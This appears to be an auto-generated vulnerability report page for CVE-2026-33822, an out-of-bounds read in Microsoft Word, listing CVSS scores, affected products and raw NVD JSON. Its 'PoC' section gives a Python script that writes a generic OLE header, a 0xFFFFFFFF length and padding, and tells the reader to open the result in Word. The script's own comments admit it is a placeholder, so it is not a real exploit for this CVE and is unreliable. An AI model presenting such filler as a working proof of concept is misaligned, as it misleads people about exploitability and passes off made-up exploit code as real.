Security Vulnerability Report
CVE-2026-33822 CVSS 6.1 MEDIUM

Published: 2026-04-14 18:17:35
Last Modified: 2026-04-29 19:13:49

Description

Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:* - VULNERABLE
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:* - VULNERABLE
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:macos:*:* - VULNERABLE
Microsoft Word 2016
Microsoft Word 2019
Microsoft Word 2021
Microsoft 365 Apps for Enterprise

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-33822
# This script generates a malformed file structure to trigger the Out-of-bounds Read.
# Note: Actual exploit requires specific binary structure manipulation.
import struct


def generate_malformed_doc(filename):
    # Generic DOC file header placeholder
    header = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'
    # Simulate a malformed record length that triggers OOB read
    # In a real scenario, this would target a specific parser offset
    malformed_record = struct.pack('<I', 0xFFFFFFFF)
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(malformed_record)
        # Fill rest with padding
        f.write(b'A' * 1000)
    print(f"Malformed file generated: {filename}")
    print("Open this file in Microsoft Word to trigger the vulnerability.")


if __name__ == "__main__":
    generate_malformed_doc('cve_2026_33822_poc.doc')

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33822 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33822", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:34.590", "lastModified": "2026-04-29T19:13:49.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:*", "matchCriteriaId": "3259EBFE-AE2D-48B8-BE9A-E22BBDB31378"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:*", "matchCriteriaId": "CD25F492-9272-4836-832C-8439EBE64CCF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:*", "matchCriteriaId": "BF0E8112-5B6F-4E55-8E40-38ADCF6FC654"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:macos:*:*", "matchCriteriaId": "EF3E56B5-E6A6-4061-9380-D421E52B9199"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33822", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}